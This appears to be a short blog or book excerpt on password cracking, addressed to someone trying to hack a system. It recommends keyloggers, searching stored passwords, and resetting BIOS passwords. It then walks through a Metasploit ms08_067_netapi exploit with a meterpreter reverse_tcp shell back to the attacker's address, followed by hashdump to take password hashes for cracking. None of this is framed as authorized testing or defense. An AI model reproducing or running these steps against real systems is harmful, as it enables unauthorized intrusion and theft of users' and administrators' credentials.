Other Ways to Uncover Passwords
As mentioned earlier, the easiest way to crack a password is to have physical access to the system that you are trying to hack. If you are not able to make use of cracking tools on a system, you can use the following techniques instead:
1. Keystroke logging
This is easily one of the most efficient techniques in password cracking, since it makes use of a recording device that captures keystrokes as they are typed in a keyboard. You can use of a keyboard logging software, such as the KeyLogger Stealth and the Spector Pro, or a keylogging hardware such as the KeyGhost
2. Searching for weak password storages
There are too many applications in most computers that store passwords locally, which make them very vulnerable to hacking. Once you have physical access to a computer, you can easily find out passwords by simply searching for storage vulnerabilities or making use of text searches. If you are lucky enough, you can even find stored passwords on the application itself.
3. Weak BIOS Passwords
Many computers allow users to make use of power on passwords in order to protect hardware settings that are located in their CMOS chips. However, you can easily reset these passwords by simply changing a single jumper on the motherboard or unplugging the CMOS battery from the board. You can also try your luck and search online for default user log in credentials for different types of motherboards online.
4. Grab passwords remotely
If physical access to the system or its location is impossible, you can still grab locally stored passwords on a system running on a Windows OS from remote location and even grab the credentials of the system administrator account. You can do this by doing a spoofing attack first, and then exploiting the SAM file on the registry file of the targeted computer by following these steps:
1. Pull up Metasploit and type the following command: msf > use exploit/windows/smb/ms08_067_netapi
2. Next, enter the following command: msf (ms08_067_netapi) > set payload /windows/meterpreter/reverse_tcp
After doing so, Metaploit will show you that you need to have the target’s IP address (RHOST) and the IP address of the device that you are using (LHOST). If you have those details already, you can use the following commands to set the IP addresses for the exploit
msf (ms08_067_netapi) > set RHOST [target IP address]
msf (ms08_067_netapi) > set LHOST [your IP address]
3. Now, do the exploit by typing the following command:
msf (ms08_067_netapi) > exploit
This will give you a terminal prompt that will allow you to access the target’s computer remotely
4. Grab the password hash
Since most operating systems and applications tend to store passwords in hashed for encryption purposes, you may not be able to see the user credentials that you are after right away. However, you can get these hashes and interpret them later. To grab the hashes, use this command: meterpreter > hashdump
After entering this, you will see all the users on the system you are hacking, and the hashed
passwords. You can then attempt to decrypt these hashes using tools such as Cain & Abel.
No comments